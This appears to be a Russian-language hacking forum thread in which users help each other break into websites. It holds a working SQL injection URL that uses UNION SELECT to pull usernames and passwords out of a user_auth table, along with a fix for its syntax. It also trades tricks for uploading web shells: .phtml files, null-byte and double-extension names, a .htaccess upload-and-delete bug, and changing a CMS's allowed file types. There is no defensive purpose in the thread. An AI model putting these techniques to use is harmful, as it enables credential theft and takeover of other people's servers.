Залей в формате *.phtml, на демке, в офф сайте пашет http://demo.opensourcecms.com/websitebaker/media/file.phtml phpinfo();
я заливаю его через лоад языка, вроде все норм грузиться, но когда начинаю пользоваться шеллом то выкидывает на страницу загрузки языка((
Помогите плз! нашел в базе таблицы: user_auth emails clients при попытке вывести данные из user_auth , вылетает ошибка www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_name,user_password))+from+user_auth+limit+0,1-- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from user_auth limit 0,1--' at line 1 а из других таблиц все нормально выводится в чем может быть проблема?????
Code: www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_name,user_password[B])[/B]))+from+user_auth+limit+0,1--+ скобку пропустил
Если отрублены функции exec,passthru,popen,proc_open,shell_exec,system,pcntl_exec есть другие варианты?)))
Хочу залить шелл через баннер / картинку... Побываю так shell.php%00.gif shell.php.gif если просто shell.php то режет...Локального инклуда нет Есть ещё варианты?
Einstein, HTML: www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat(user_name,char(58),user_password)))+from+0x757365725f61757468+limit+0,1--+[/HTML [B]aydin-ka[/B], Название CMS? Попробуй старый добрый *.phtml.
-=Sinner=-, через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
прийдется помудрить с разрешенными раширениями.сначала залей .htaccess потом удаляй его..из за баги удалится оригинальный файл потом уже файл нужный
Разрешения загружаемых файлов dzmvdq,pdf,htaccess,php,zip,rar,phtml,doc,exe так же доступна загрузка изображений с самой админки может это как то облегчит заливку шелла ?
